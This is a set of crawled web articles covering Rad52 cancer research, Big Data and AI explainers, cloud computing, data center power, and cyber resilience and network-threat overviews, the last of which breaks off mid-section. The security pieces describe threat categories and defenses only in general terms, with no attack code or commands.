2024-09-12T23:43:57Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651498.46/warc/CC-MAIN-20240912210501-20240913000501-00607.warc.gz
en
0.955558
1,264
2.6875
3
Scientists at Scripps Research have uncovered a new strategy to kill tumors, including some triple-negative breast cancers, without harming healthy cells, a discovery that could lead to more ways to treat tumors while reducing side effects. The study, published recently in Nature Communications, shows that a molecule in cells, called Rad52, repairs special kinds of damaged DNA that accumulate in some cancers. A future therapeutic could inhibit Rad52, robbing cancer cells of this repair mechanism. “This could give us a way to kill tumors without harming normal cells,” says Xiaohua Wu, Ph.D., professor at Scripps Research and senior author of the study. “That’s the future. That’s the goal for targeted cancer treatments—to make these treatments a part of precision medicine.” Wu and her colleagues investigate how seemingly healthy cells become cancerous, with an eye toward leveraging differences between cancers and healthy cells to develop new therapeutic approaches. The culprits may be different from patient to patient, so the key to killing specific cancer types is to study the basic roles of proteins—and how things go awry in different cancers. “The most important thing is to understand the defects in all these tumors, and then you can understand how to target them specifically,” says Wu. One cancer subtype is triple-negative breast cancer, which make up 10 to 20 percent of breast cancer diagnoses. This aggressive form strikes an estimated 28,000 Americans each year. The new research shows how to exploit a weakness in some triple-negative breast cancers. Some of these tumors have a deficient version of the gene that codes for a protein called FANCM. Normally, this protein protects regions of DNA called common fragile sites, which are prone to breaking when cells divide. Wu’s team found that FANCM-deficient tumors have to call in a backup team to repair DNA. That’s when the protein Rad52 steps in to repair DNA damage in these tumors. This finding came as a surprise because Rad52 plays no essential role in healthy cells. Next, the researchers tested what would happen if they stopped Rad52 from working in FANCM-deficient cells. As they suspected, the cells accumulated double-strand breaks at common fragile sites. With no way to repair these breaks, the cells died. Follow-up experiments in a mouse model showed that suppressing Rad52 in FANCM tumors dramatically reduced cell and tumor growth. This phenomenon, when a cell only dies because of a combination of two defects, is called synthetic lethality. Only cells with both defects will die. This means drugs inhibiting Rad52 would not harm healthy cells, which do have sufficient FANCM. Only FANCM-deficient cells, like those seen in some triple-negative breast cancers, would die. “Normal cells are fine when you remove Rad52, so we think potential therapies would have a very low toxicity,” Wu says. Exploiting synthetic lethality is emerging as a crucial strategy in cancer drug design. In fact, the U.S. Food and Drug Administration recently approved several drugs called PARP inhibitors, which also take advantage of synthetic lethality to kill tumors with BRCA mutations. Wu says the next step in this project is to develop potent small molecule inhibitors of Rad52 that could be tested as a drug candidate for a new targeted cancer therapy. “This study shows why it’s very important to focus on basic research and then follow-up on findings that can benefit patients,” Wu says. More information: Hailong Wang et al, The concerted roles of FANCM and Rad52 in the protection of common fragile sites, Nature Communications (2018). DOI: 10.1038/s41467-018-05066-y Journal reference: Nature Communications search and more info website Provided by: The Scripps Research Institute
<urn:uuid:0bc7075e-cd5a-4e66-aef7-dede4c6e2cb5>
CC-MAIN-2024-38
https://debuglies.com/2018/07/26/research-have-uncovered-a-new-strategy-to-kill-tumors-including-some-triple-negative-breast-cancers/
2024-09-16T15:53:56Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.45/warc/CC-MAIN-20240916144317-20240916174317-00307.warc.gz
en
0.947902
826
3.015625
3
Game of Data: A Look at Big Data and its Quest for the Throne How much data is created daily? 2.5 quintillion bytes. (Everyday Big Data Infographic, VCloud News) “Big Data” is more than just a technology trend or marketing terminology—it’s a vital part of the modern business. Gartner's IT Glossary describes Big Data as "high-volume, high-velocity, and high-variety information assets that demand cost-effective, innovative forms of information processing for enhanced insight and decision making." What does that mean for you? Big Data has the potential to unlock a wide range of patterns and trends, much of which can help with better decision making and business strategy. Whether your business needs to adjust the price of a product or even change your hours of operations, Big Data can play a crucial role in the way you choose to manage your business. Businesses generate and gather high volumes of data every day in the process of doing business. Think about a simple transaction: You can't just sell a widget; you need documentation about who made the widget, where the parts for the widget come from and what they cost, how you're going to market the widget, what you're going to charge for the widget, what you're competitors charge for the widget, and so on. There are a lot of pieces of data that are generated or shared in the course of a day, and the volume of data is just one aspect to understanding Big Data. The speed at which businesses move is faster than it was five years ago, thanks to technology and the interconnectedness of global organizations. Not only are there large amounts of data being created, shared or stored, but the speed at which that data is generated has increased. The "drinking from a fire hose" cliché perfectly applies to the fast flow of data into and out of organizations non-stop, all day, every day. Most businesses don't track where the data comes from, how it can be used, or where it's stored. This part of Big Data is important to understand as it’s a core component of why it’s the data deluge has created the need for a new category of data collection or storage. On a regular basis, businesses generate a diverse amount of data such as customer buying habits, website traffic, music downloads, HR or finance information, or research information. This data is often created or received as structured data, which means that rational or logical data isn’t in an easily searchable database or spreadsheet. This can also be called unstructured data, which is not easy to analyze or categorize and makes up a majority of businesses data which requires additional algorithms or intelligence to sort through. To add to the complexity of variety, unstructured data comes in all shapes and sizes, .Digital files such as photos, videos, audio recordings, email messages, documents, books, tweets and presentations are all forms of varied, unstructured data. Data diversity is an important element when it comes to understanding the difference between Big Data and other types of data. Information, Insight, and Decision Making Analyzing Big Data requires that you first separate the "wheat from the chaff," ultimately making the data accessible and useable. The right aggregators and data integration tools can gather that data into useable containers and provide you with the proper algorithms to access that data in informative ways. Organizing the data into a central repository is an important step in Big Data management. The analysis of the data is also where you gain the most insights that are actionable for your business. In today’s ever changing business climate, if you aren’t using your organization’s Big Data to your advantage, you could find yourself one step behind the competition. Protecting That Data Businesses must pursue dedicated data management solutions to securely and efficiently manage their Big Data migration needs. These tools must not only be capable of moving large information sets quickly and effectively, but also ensuring the protection of that data when it is in motion, as this is when Big Data. Solutions designed specifically to meet the needs of Big Data movement can help safeguard the information as it is sent and received by individuals and departments within a given organization and between locations. Want to learn more about how a secure managed file transfer solution can help manage your Big Data challenges? Contact a Globalscape Solution Specialist today to let us help you! Disruptive Tech Trends Resources Undoubtedly, the way we access and receive information, interact with the world around us, and produce data has completely evolved in recent years. For IT teams, how will some of these tech trends affect the way data is secured, managed, or shared? Are these trends just hype or actually helpful? In this guide, you’ll learn about: - Some of today’s disruptive trends, such as augmented reality and Internet of Things (IoT) - Key considerations for organizations seeking to take advantage of these trends - Ways to protect the flow of data as new trends take hold
<urn:uuid:ae5d1246-07e5-4861-9bae-e29f0270773b>
CC-MAIN-2024-38
https://www.globalscape.com/blog/big-data-and-your-business
2024-09-16T15:07:28Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.45/warc/CC-MAIN-20240916144317-20240916174317-00307.warc.gz
en
0.945987
1,045
2.75
3
There was a time when data center operators, engineers, and consultants could safely focus on their core areas of data storage and data processing, safe in the knowledge that their power socket would deliver a sufficient and stable supply of energy to maintain and expand the data center business. Now, ensuring sufficient power, it's reliable supply and steady quality from the grid have become strategic concerns. Not only is the constant growth of data center infrastructure with its increasing demand for power outstripping grid capacity in some areas of the world; due to the increasing share of stochastic renewable in-feed, creating volatility and fluctuation, the availability and quality of power supply have dropped and might pose a threat to reliable data center operation. One solution to this challenge facing the data center industry is on-site generation of electricity and cooling. Diesel generators have long been the go-to option for rapid backup power, which resulted in increased emissions of hazardous exhaust gases and pollutant particles. However, with the latest technological advances in highly efficient gas turbine technology, generating power on-site for the main supply of data centers has become far more attractive, solving grid challenges today and also in the long-term. In the future, these stable, low-emission on-site power generation solutions will be able to run exclusively on carbon free fuels such as e-hydrogen.
<urn:uuid:e6ef4eea-8260-4acb-aec5-58d4d2f77dc9>
CC-MAIN-2024-38
https://www.datacenterdynamics.com/en/whitepapers/-site-power-generation-leverage-maximum-uptime/
2024-09-19T05:02:22Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651981.99/warc/CC-MAIN-20240919025412-20240919055412-00107.warc.gz
en
0.95099
271
2.71875
3
Nowadays, cyber threats are an ever-present risk that can disrupt business operations, compromise sensitive data, and damage an organization’s reputation. As cyber attacks become more sophisticated and frequent, the ability to not just prevent but also withstand and recover from these threats has become paramount. This is where the concept of cyber resilience comes into play. Cyber resilience goes beyond traditional cybersecurity measures, focusing on the holistic capability of an organization to continue operating amidst and after a cyber attack. A cyber resilience strategy relies on anticipating potential threats, minimizing their impact, and resume operations as soon as possible. To achieve this level of preparedness and responsiveness, organizations must develop and implement a comprehensive and effective incident response and cybersecurity plans. Today, we will delve into the key components of a strong cyber resilience strategy and explore the essential elements that empower organizations to protect their critical assets, ensure continuity of operations, and adapt to the ever-evolving cyber threat landscape. Cyber Resilience Strategy – Definition and Key Components A cyber resilience strategy is a comprehensive plan designed to help organizations prepare for, respond to, and recover from cyber threats. Unlike traditional cybersecurity, which focuses primarily on preventing attacks, viable cyber resilience strategy emphasizes the importance of maintaining business operations even when an attack occurs. It encompasses a holistic approach that integrates risk management, incident response, business continuity, and continuous improvement. The key components of organization’s cyber resilience include: - Preparedness: Establishing processes and protocols to anticipate and prepare for potential cyber threats. - Detection: Implementing systems and technologies to identify and detect cyber threats in real-time. - Response: Developing and executing a response plan to mitigate the impact of cyber incidents. - Recovery: Ensuring the organization can quickly recover and returned to normal operation after a cyber incident. - Adaptation: Continuously improving and updating strategies (including the cyber resilience plan) based on lessons learned and evolving threats. Cyber Resilience Strategy A cyber resilience strategy is a structured approach designed to enhance an organization’s ability to withstand and recover from cyber security attacks while maintaining continuous operations. It encompasses a comprehensive set of practices, policies, and a strategy with existing tools and technologies aimed at enhancing an organization’s ability to withstand and adapt to adverse cyber events. Here are the key elements of a successful cyber resilience strategy: 1. Risk Assessment and Management: - Identify Critical Assets: Identify essential operational activities, assets, data, and processes (mission critical systems). - Threat Analysis: Understand the types of cyber threats that could impact the organization. - Vulnerability Assessment: Identify weaknesses within the organization’s systems and infrastructure. - Risk Mitigation: Implement strategies and controls to reduce identified risks. 2. Governance and Compliance: - Policies and Procedures: Establish and enforce policies to manage cyber risks effectively. - Regulatory Compliance: Ensure the organization meets all relevant legal and regulatory requirements. - Roles and Responsibilities: Clearly define roles and responsibilities for cybersecurity and resilience efforts. 3. Technology and Infrastructure: - Security Controls: Deploy advanced security technologies such as firewalls, intrusion detection systems, and encryption. - Resilient Infrastructure: Build robust IT infrastructure that can withstand and quickly recover from cyber attacks. - Response Tools: Utilize tools and technologies to respond to and manage cyber threads efficiently. Trust AMATAS cyber security testing services for a detailed assessments to enhance your cyber defenses. 4. Human Factors and Training: - Awareness Programs: Conduct regular training sessions to educate employees about cyber threats and best practices. - Skill Development: Continuously enhance the cybersecurity skills of the workforce. - Cultural Change: Promote a culture of cyber awareness and resilience within the organization. 5. Incident Response and Management: - Response Plan: Develop a detailed incident recovery and response plan [LINK to blog] outlining steps to take during a cyber incident. - Communication: Establish clear communication protocols for internal and external stakeholders. - Testing and Drills: Regularly test the response plan through simulations and drills to ensure effectiveness. 6. Business Continuity and Disaster Recovery: - Continuity Planning: Integrate cyber resilience into broader business continuity plans. - Backup and Recovery: Ensure regular backups and quick recovery capabilities for mission critical company assets, ex. data and systems. - Resilience Metrics: Use key performance indicators and metrics to measure and monitor resilience. 7. Continuous Improvement: - Monitoring and Review: Continuously monitor cyber resilience efforts and review their effectiveness. - Feedback Loop: Incorporate lessons learned from incidents and drills into the strategy. - Innovation: Stay updated with the latest technologies and practices in cybersecurity. A strong cyber resilience strategy equips organizations with the tools and processes needed to navigate the complex and evolving cyber threat landscape, ensuring they can sustain their operations, protect their assets, and uphold their reputation even in the face of adversity. Cornerstones of a Cyber Resilience Strategy To build a strong cyber resilience strategy, organizations must focus on several fundamental aspects that collectively enhance their ability to withstand and recover from cyber threats. Identifying Potential Threats and Vulnerabilities Continuous monitoring and detection of security weaknesses are crucial to prevent potential breaches. Organizations must employ advanced tools and techniques, along with existing security protocols and processes, and perform a risk analysis to identify vulnerabilities within their systems. Regular usage of vulnerability assessment services and threat intelligence gathering help in understanding the evolving threat landscape and preparing defenses accordingly. This proactive approach ensures that potential threats are identified and addressed before they can cause significant harm. Assessing and Prioritizing Risks Once potential threats and vulnerabilities are identified, the next step is to dig deeper on risk management. This involves analyzing the impact and likelihood of various threats to prioritize them effectively. By focusing resources on critical areas with the highest risk, organizations can allocate their cybersecurity efforts more efficiently. Risk assessment frameworks, such as the NIST Cybersecurity Framework, can provide structured methodologies for this evaluation process. Developing Incident Response Plans Creating structured response plans is vital for managing security incidents effectively. These plans should outline specific steps to take during a cyber incident, including roles and responsibilities, communication protocols, and recovery procedures. Regularly testing and updating these plans through simulations and drills ensures that the organization is prepared to respond swiftly and minimize damage during a real incident. Establishing a Resilient Framework for Business Processes A resilient business framework ensures that operations can continue without significant disruptions during a cyber attack. This involves designing and implementing robust processes and systems that can withstand cyber incidents. Redundancy, failover mechanisms, and disaster recovery plans are essential components of this framework. By ensuring business continuity, organizations can maintain critical functions and services even in the face of cyber threats and achieve cyber resilience. Ensuring Information Security and Data Protection Protecting sensitive information from unauthorized access and breaches is a cornerstone of effective cyber resilience. Implementing strong security policies, encryption, access controls, and data loss prevention measures are essential to safeguard critical data. Regular audits and compliance with data protection regulations, such as GDPR, DORA compliance checklist or CCPA, further enhance information security and build trust with stakeholders. Incorporating AI in Cyber Resilience Leveraging advanced technologies like AI can significantly enhance cyber resilience. These technologies can analyze vast amounts of data to predict, detect, and respond to cyber threats in real-time. AI-driven security solutions can identify patterns and anomalies that traditional methods might miss, providing an additional layer of defense and improving the overall security posture. Building a Cyber Resilience Framework To ensure comprehensive coverage, organizations must develop a well-structured cyber resilience framework. This framework integrates various components and practices to create a cohesive and effective approach to cybersecurity. Understanding the Resilience Framework and Its Components A cyber resilience framework comprises several key elements designed to provide complete security coverage. These include management of risk, incident response, business continuity, and continuous improvement. Understanding these components and how they interrelate is crucial for developing an effective strategy that addresses all aspects of organization’s cyber resilience. Implementation of a Risk Management Approach Adopting strategic management of risk practices is essential for identifying, assessing, and mitigating potential cyber threats. This involves establishing risk management processes, conducting regular risk assessments, and implementing controls to reduce identified risks. By systematically managing risks, organizations can prioritize their cybersecurity efforts and allocate resources more effectively. Regular Tests and Evaluations of Framework Effectiveness Periodic assessments of the cyber resilience framework are necessary to measure its effectiveness and make necessary adjustments. This includes conducting regular security audits and penetration tests. These evaluations help identify gaps and weaknesses in the the resilience framework but understanding them, ensuring continuous improvement and adaptation to new threats. You can use AMATAS penetration testing services to help you find the gaps in your cyber security. Addressing Emerging Threats and Evolving Cyber Attack Techniques Cyber threats are constantly evolving, making it essential for organizations to stay ahead of new challenges. This involves monitoring the threat landscape, updating security measures, and adopting innovative technologies to counteract emerging threats. Proactive adaptation and flexibility are key to maintaining a robust defense against sophisticated cyber attacks. Integration of Cyber Resilience into the Organization’s Culture Embedding cyber resilience principles deeply within the organizational culture enhances overall security awareness and response. This includes fostering a culture of continuous learning, encouraging cybersecurity best practices, and ensuring that all employees understand their role in maintaining cyber resilience. A security-conscious culture helps in building a strong, cyber resilient organization. In an era where cyber threats are increasingly sophisticated and prevalent, developing a successful cyber resilience strategy is more crucial than ever. This strategy is not merely about protecting against attacks but also about ensuring that an organization can continue to operate, even in the face of adversity. The components underpinning cyber resilience – such as having an effective incident response plan, conducting regular security trainings and performing vulnerability tests – are essential for mitigating risks. By aligning these efforts with business goals, organizations can turn cyber resilience into a competitive advantage, ensuring long-term security and stakeholder trust. Build a cyber resilience with AMATAS AMATAS can help you build and implement an exhaustive cyber resilience framework tailored to your needs. Are you in need of a trusted cybersecurity partner? Contact us, and let’s discuss how we can help you protect your organization, achieve cyber resilience and enhance your business resilience against cyber threats! What Are the Latest Trends in Cybersecurity? Cybersecurity is a dynamic industry mainly because the threats are evolving daily. Some of the most trending (but not necessary the most effective) infosec technologies include artificial intelligence (AI) and blockchain. There is also an increased focus on cloud security, zero trust architecture, and the growing importance of securing Internet of Things (IoT) devices. What Are the Three Critical Component of Cyber Resilience? The three critical components of cyber resilience are risk mitigation, incident recovery and response, and business continuity. Risk mitigation involves identifying and managing potential threats, incident action plan focuses on effectively handling and recovering from cyber incidents, and business continuity ensures that critical operations can continue without significant disruption. What Makes a Good Cybersecurity Strategy? A successful cybersecurity strategy includes a thorough risk assessment, robust incidents response plans, and continuous monitoring and improvement as well as conducting regular employee trainings. It should align with business objectives, ensure compliance with regulations, and incorporate employee awareness programs. Additionally, leveraging advanced technologies like AI and maintaining a proactive approach to emerging threats are essential.
<urn:uuid:4a4fb5af-ccfb-437f-aaa5-30a3c89d0e2c>
CC-MAIN-2024-38
https://amatas.com/blog/cyber-resilience-strategy-key-components/
2024-09-08T07:04:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650960.90/warc/CC-MAIN-20240908052321-20240908082321-00207.warc.gz
en
0.922303
2,385
2.8125
3
This is the second part of the series. You can read the first part of the article here. Back in the 80s, we marveled at technologies like what were shown in Back to the Future. We hoped for the day when we could have our own hoverboards, biometric devices and headsets that could receive calls and let you watch TV. Today, technology has given us these and more. Aside from hoverboards, biometric devices, gaming headsets and other wearables, we now also have consumer drones, video calls, Xbox Kinect and other hands-free gaming systems and tablets like the iPad. Our technology at present is so advanced that it has become common to suggest or expect even the most unexpected devices to come out in the market. Two of the highly talked about advance technologies are Big Data and Artificial Intelligence (AI). And when we talk about these two, the concept of “Deep Learning” is never far behind. Big Data sounds like a very big word that it often comes out intimidating – like its some complex idea that’s difficult to grasp; that is if you are not a techy person. While Big Data can be powerful, it is not at all what you perceive it to be. Its concept is actually quite simple: it is a collection of data taken from different traditional and digital sources. It is a new method of storing, managing and manipulating data. All data collected and stored are from internal and external sectors of a company or an organization. Big Data is, most often than not, intended for analysis and discovery, and is useful in making more accurate predictions and decisions. For example, a company selling a new product wants to know if their regular customers will like it. They can use Big Data to collect information regarding customer preferences and buying attitudes to come up with a decision. If you want to know what Big Data looks like, just imagine a huge warehouse with stacks and stacks of products. Actually, this was what Big Data was all about in the old days; large warehouses with data equipped with business intelligence solutions that can be used for reporting. What we have today is similar to this, but there’s no physical address or location – and all processes are done in real time. Big Data has worked wonders for many organizations because it has made them more “intelligent”. When we talk about someone or something being intelligent, one of the first technology outputs that come to mind is Artificial Intelligence. Although it has been around for years, AI or machine learning has not made an impact as major as it is creating nowadays. Simply put, Artificial Intelligence is all about making computers behave like humans. AI is a term that was created by John McCarthy back in 1965. Several areas of specialization are connected to AI, including expert systems or computers programmed to come up with decisions in real life situations, natural language or computers programmed to understand human languages, and computers programmed to play games against humans. Siri on your iPhone is a good example of AI. So is Google Now, Google’s personal assistant. The Relationship of Big Data and AI The information that you collect from Big Data is used to understand customers and help you come up with a strategy for satisfying them; by giving them what they need and want. However, this can sometimes fall short and you will have to find a way to understand complex analysis. This is where Artificial Intelligence comes in. AI can perform tasks faster than humans. Because of AI, machines can think and act like humans. Therefore, tasks are performed better and in a more efficient manner. Information can be processed in the fastest time possible. Coupled with deep learning, Artificial Intelligence can prove to be a major factor in Big Data networks. Deep learning is a technology that trains machines to classify, recognize and categorize data patterns by stimulating its “brain”. It is a neural network that leverages major amounts of data intended to solve difficult or complicated tasks. Some good examples of deep learning are Google Brain and DeepMind. Big Data, Artificial Intelligence and Deep Learning are Interconnected AI can assist deep learning through unsupervised data. These data are fed to the machine – and on its own, it will find a way to do tasks that have to be done. Thus, we do not need to tell them what they should do. This symbiosis can result to a lot of positive changes, particularly in terms of inventions. However, this will entail a lot of work for our machines. They will need to go beyond what they already have, beyond the data. This can be done, but at this point, much has to be improved to Artificial Intelligence. AI technology is already remarkable as it is. But, if we want to reach the level where we can go far beyond controlling driverless cars or enjoying the conveniences of having a home robot, we need to aim for more. As it is, there is a limit to the data instilled in today’s AI. Home robots can only do so much. Our driverless cars can only function to a limit. Thus, we need to push some more and go beyond what we already have in our hands. Geometric Intelligence founder and CEO Gary Marcus believes that it is important to bring the ultimate AI to the table. This means combining the best of what people can do with the best of what machines are able to do. However, to achieve this, we need to go back to the basics – and that is psychology. We need to find the time to study ourselves, human beings. This will help us reach a deeper understanding of humans, which we can then use to formulate and develop Marcus’ ideal AI. Despite the fact that a lot can still be improved and new technologies can still be developed, Artificial Intelligence and Big Data are essential in a highly technological world like ours. We don’t need Marty McFly to tell us this. We only need to see all the developments cropping up one after the other. After hoverboards, home robots, flying drones and wearable technology, we’re bound to see more. We just need to give the ultimate AI a little more time to take off. Photo courtesy of A Health Blog.
<urn:uuid:db611cde-e04b-4fc2-a50e-60166ca0b9c0>
CC-MAIN-2024-38
https://fourcornerstone.com/big-data-artificial-intelligence-deep-learning-perfect-technology-trident-part-2-2/
2024-09-08T06:47:11Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650960.90/warc/CC-MAIN-20240908052321-20240908082321-00207.warc.gz
en
0.962298
1,268
3.125
3
The basic idea behind cloud computing and virtualization is twofold. On the surface, it entails taking IT services that are normally on-site, such as data storage or web servers, and moving them onto third-party servers which are accessible from anywhere over the Internet. Amazon’s Web Services (AWS) is a fine example of this. Thousands of highly successful websites are being hosted by Amazon rather than their company, because Amazon has a more robust and stable platform. The other main aspect of cloud computing and virtualization is conceptual: it redefines IT as being a service rather than an infrastructure investment. Activities such as data storage, which traditionally involves expensive purchases of servers and people to maintain them, can now be considered an on-demand service. A company pays for (X) Terabytes of storage and data transfer, and if they need more, they simply call up the provider and ask for it. From a business perspective, there are numerous benefits to this shift towards a cloud-based infrastructure. Among these are: - It is almost always cheaper than on-site solutions, although often not as much as some cloud proponents claim. - It frees up internal resources to deal with your business’s core competencies, by shifting the IT burden onto a third party. - Because cloud services can be accessed through any Internet-connected device, it becomes far easier to integrate new technologies, such as smartphones and tablets, into the system regardless of platform. - For businesses with end-user software, the customers also benefit from this universal access. - Businesses can become much more flexible with their computing needs and demands. Future-proofing is also simplified. Basically, cloud computing and virtualization services are growing at an astounding rate. According to a recent survey, over 60% of servers will be virtual by 2014. Cloud computing is a rising tide, and one that businesses are finding hard to ignore. The many overall benefits to efficiency and the TCO of their IT operations are simply too significant to overlook.
<urn:uuid:79e2cd47-c59e-4594-a78d-ebb840ef9e76>
CC-MAIN-2024-38
https://www.abcservices.com/understanding-cloud-computing/
2024-09-09T11:44:26Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651098.19/warc/CC-MAIN-20240909103148-20240909133148-00107.warc.gz
en
0.966294
414
2.53125
3
Modern organizations face a wide and constantly changing range of network security threats, and security leaders must constantly update their security posture against them. As threat actors change their tactics, techniques, and procedures, exploit new vulnerabilities, and deploy new technologies to support their activities — it’s up to security teams to respond by equipping themselves with solutions that address the latest threats. The arms race between cybersecurity professionals and cybercriminals is ongoing. During the COVID-19 pandemic, high-profile ransomware attacks took the industry by storm. When enterprise security teams responded by implementing secure backup functionality and endpoint detection and response, cybercriminals shifted towards double extortion attacks. The cybercrime industry constantly invests in new capabilities to help hackers breach computer networks and gain access to sensitive data. Security professionals must familiarize themselves with the latest network security threats and deploy modern solutions that address them. What are the Biggest Network Security Threats? 1. Malware-based Cyberattacks Malware deserves a category of its own because so many high-profile attacks rely on malicious software to work. These include everything from the Colonial Pipeline Ransomware attack to historical events like Stuxnet. Broadly speaking, cyberattacks that rely on launching malicious software on computer systems are part of this category. There are many different types of malware-based cyberattacks, and they vary widely in scope and capability. Some examples include: Viruses. Malware that replicates itself by inserting its own code into other applications are called viruses. They can spread across devices and networks very quickly. Ransomware. This type of malware focuses on finding and encrypting critical data on the victim’s network and then demanding payment for the decryption key. Cybercriminals typically demand payment in the form of cryptocurrency, and have developed a sophisticated industrial ecosystem for conducting ransomware attacks. Spyware. This category includes malware variants designed to gather information on victims and send it to a third party without your consent. Sometimes cybercriminals do this as part of a more elaborate cyberattack. Other times it’s part of a corporate espionage plan. Some spyware variants collect sensitive information that cybercriminals value highly. Trojans. These are malicious applications disguised as legitimate applications. Hackers may hide malicious code inside legitimate software in order to trick users into becoming victims of the attack. Trojans are commonly hidden as an email attachment or free-to-download file that launches its malicious payload after being opened in the victim’s environment. Fileless Malware. This type of malware leverages legitimate tools native to the IT environment to launch an attack. This technique is also called “living off the land” because hackers can exploit applications and operating systems from inside, without having to download additional payloads and get them past firewalls. 2. Network-Based Attacks These are attacks that try to impact network assets or functionality, often through technical exploitations. Network-based attacks typically start at the edge of the network, where it sends and receives traffic to the public internet. Distributed Denial-of-Service (DDoS) Attacks. These attacks overwhelm network resources, leading to downtime and service unavailability, and in some cases, data loss. To launch DDoS attacks, cybercriminals must gain control over a large number of compromised devices and turn them into bots. Once thousands (or millions) of bots using unique IP addresses request server resources, the server breaks down and stops functioning. Man-in-the-Middle (MitM) Attacks: These attacks let cybercriminals eavesdrop on communications between two parties. In some cases, they can also alter the communications between both parties, allowing them to plan and execute more complex attacks. Many different types of man-in-the-middle attacks exist, including IP spoofing, DNS spoofing, SSL stripping, and others. 3. Social Engineering and Phishing These attacks are not necessarily technical exploits. They focus more on abusing the trust that human beings have in one another. Usually, they involve the attacker impersonating someone in order to convince the victim to give up sensitive data or grant access to a secure asset. Phishing Attacks. This is when hackers create fake messages telling victims to take some kind of action beneficial to the attacker. These deceptive messages can result in the theft of login credentials, credit card information, or more. Most major institutions are regularly impersonated by hackers running phishing scams, like the IRS. Social Engineering Attacks. These attacks use psychological manipulation to trick victims into divulging confidential information. A common example might be a hacker contacting a company posing as a third-party technology vendor, asking for access to a secure system, or impersonating the company CEO and demanding an employee pay a fictitious invoice. 4. Insider Threats and Unauthorized Access These network security threats are particularly dangerous because they are very difficult to catch. Most traditional security tools are not configured to detect malicious insiders, who generally have permission to access sensitive data and assets. Insider Threats. Employees, associates, and partners with access to sensitive data may represent severe security risks. If an authorized user decides to steal data and sell it to a hacker or competitor, you may not be able to detect their attack using traditional security tools. That’s what makes insider threats so dangerous, because they are often undetectable. Unauthorized Access. This includes a broad range of methods used to gain illegal access to networks or systems. The goal is usually to steal data or alter it in some way. Attackers may use credential-stuffing attacks to access sensitive networks, or they can try brute force methods that involve automatically testing millions of username and password combinations until they get the right one. This often works because people reuse passwords that are easy to remember. Solutions to Network Security Threats Each of the security threats listed above comes with a unique set of risks, and impacts organizations in a unique way. There is no one-size-fits-all solution to navigating these risks. Every organization has to develop a cybersecurity policy that meets its specific needs. However, the most secure organizations usually share the following characteristics. Fundamental Security Measures Well-configured Firewalls. Firewalls control incoming and outgoing network traffic based on security rules. These rules can deny unauthorized traffic attempting to connect with sensitive network assets and block sensitive information from traveling outside the network. In each case, robust configuration is key to making the most of your firewall deployment. Choosing a firewall security solution like AlgoSec can dramatically improve your defenses against complex network threats. Anti-malware and Antivirus Software. These solutions detect and remove malicious software throughout the network. They run continuously, adapting their automated scans to include the latest threat detection signatures so they can block malicious activity before it leads to business disruption. Since these tools typically rely on threat signatures, they cannot catch zero-day attacks that leverage unknown vulnerabilities. Advanced Protection Tools Intrusion Prevention Systems. These security tools monitor network traffic for behavior that suggests unauthorized activity. When they find evidence of cyberattacks and security breaches, they launch automated responses that block malicious activity and remove unauthorized users from the network. Network Segmentation. This is the process of dividing networks into smaller segments to control access and reduce the attack surface. Highly segmented networks are harder to compromise because hackers have to repeatedly pass authentication checks to move from one network zone to another. This increases the chance that they fail, or generate activity unusual enough to trigger an alert. Security and Information Event Management (SIEM) platforms. These solutions give security analysts complete visibility into network and application activity across the IT environment. They capture and analyze log data from firewalls, endpoint devices, and other assets and correlate them together so that security teams can quickly detect and respond to unauthorized activity, especially insider threats. Endpoint Detection and Response (EDR). These solutions provide real-time visibility into the activities of endpoint devices like laptops, desktops, and mobile phones. They monitor these devices for threat indicators and automatically respond to identified threats before they can reach the rest of the network. More advanced Extended Detection and Response (XDR) solutions draw additional context and data from third party security tools and provide in-depth automation. Authentication and Access Control Multi-Factor Authentication (MFA). This technology enhances security by requiring users to submit multiple forms of verification before accessing sensitive data. This makes it useful against phishing attacks, social engineering, and insider threats, because hackers need more than just a password to gain entry to secure networks. MFA also plays an important role in Zero Trust architecture. Strong Passwords and Access Policies. There is no replacement for strong password policies and securely controlling user access to sensitive data. Security teams should pay close attention to password policy compliance, making sure employees do not reuse passwords across accounts and avoid simple memory hacks like adding sequential numbers to existing passwords. Preventing Social Engineering and Phishing While SIEM platforms, MFA policies and strong passwords go a long way towards preventing social engineering and phishing attacks, there are a few additional security measures worth taking to reduce these risks: Security Awareness Training. Leverage a corporate training LMS to educate employees about phishing and social engineering tactics. Phishing simulation exercises can help teach employees how to distinguish phishing messages from legitimate ones, and pinpoint the users at highest risk of falling for a phishing scam. Email Filtering and Verification: Email security tools can identify and block phishing emails before they arrive in the inbox. They often rely on scanning the reputation of servers that send incoming emails, and can detect discrepancies in email metadata that suggest malicious intent. Even if these solutions generally can’t keep 100% of malicious emails out of the inbox, they significantly reduce email-related threat risks. Dealing with DDoS and MitM Attacks These technical exploits can lead to significant business disruption, especially when undertaken by large-scale threat actors with access to significant resources. Your firewall configuration and VPN policies will make the biggest difference here: DDoS Prevention Systems. Protect against distributed denial of service attacks by implementing third-party DDoS prevention solutions, deploying advanced firewall configurations, and using load balancers. Some next generation firewalls (NGFWs) can increase protection against DDoS attacks by acting as a handshake proxy and dropping connection requests that do not complete the TCP handshake process. VPNs and Encryption: VPNs provide secure communication channels that prevent MitM attacks and data eavesdropping. Encrypted traffic can only be intercepted by attackers who go through the extra step of obtaining the appropriate decryption key. This makes it much less likely they focus on your organization instead of less secure ones that are easier to target. Addressing Insider Threats Insider threats are a complex security issue that require deep, multi-layered solutions to address. This is especially true when malicious insiders are actually employees with legitimate user credentials and privileges. Behavioral Auditing and Monitoring: Regular assessments and monitoring of user activities and network traffic are vital for detecting insider threats. Security teams need to look beyond traditional security deployments and gain insight into user behaviors in order to catch authorized users doing suspicious things like escalating their privileges or accessing sensitive data they do not normally access. Zero Trust Security Model. Assume no user or device is trustworthy until verified. Multiple layers of verification between highly segmented networks — with multi-factor authentication steps at each layer — can make it much harder for insider threats to steal data and conduct cyberattacks. Implementing a Robust Security Strategy Directly addressing known threats should be just one part of your cybersecurity strategy. To fully protect your network and assets from unknown risks, you must also implement a strong security posture that can address risks associated with new and emerging cyber threats. Continual Assessment and 